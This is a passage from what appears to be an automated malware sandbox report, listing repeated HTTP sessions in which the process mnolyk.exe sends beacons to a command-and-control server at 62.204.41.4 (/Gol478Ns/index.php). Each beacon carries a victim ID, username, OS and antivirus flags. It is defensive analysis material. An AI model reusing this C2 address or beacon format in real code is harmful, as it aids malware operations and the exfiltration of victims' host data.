                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.636575937 CET469INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      370192.168.2.75009862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:39.529541016 CET830OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.593358040 CET830INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      371192.168.2.75009962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:39.765161037 CET831OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:39.828778028 CET831INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:39 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      372192.168.2.75010062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:39.998888969 CET832OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.063755035 CET832INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      373192.168.2.75010162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:40.235234022 CET833OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.300606012 CET833INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      374192.168.2.75010262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:40.471333027 CET834OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.537971020 CET834INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      375192.168.2.75010362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:40.718413115 CET835OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:40.784142017 CET835INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      376192.168.2.75010462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:40.952666998 CET836OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.018651009 CET836INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:40 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      377192.168.2.75010562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:41.185986996 CET837OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.251419067 CET837INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      378192.168.2.75010662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:41.418241978 CET838OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.483894110 CET838INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      379192.168.2.75010762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:41.653832912 CET839OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.716232061 CET839INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      38192.168.2.74976262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:36:06.819556952 CET470OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:36:06.885020971 CET470INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:36:06 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      380192.168.2.75010862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:41.895553112 CET840OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:41.961169004 CET840INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:41 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      381192.168.2.75010962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:42.135759115 CET841OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.199654102 CET841INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      382192.168.2.75011062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:42.371968031 CET842OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.434534073 CET842INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      383192.168.2.75011162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:42.623220921 CET843OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.686508894 CET843INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      384192.168.2.75011262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:42.889738083 CET844OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:42.955672026 CET844INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:42 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      385192.168.2.75011362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:43.122477055 CET845OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.189285994 CET845INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      386192.168.2.75011462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:43.360833883 CET846OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.425688982 CET846INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                      387192.168.2.75011562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      TimestampkBytes transferredDirectionData
                                                                      Feb 6, 2023 18:37:43.614291906 CET847OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 32 36 35 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=226546&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 6, 2023 18:37:43.680242062 CET847INHTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Mon, 06 Feb 2023 17:37:43 GMT
                                                                      Content-Type: text/html; charset=UTF-8
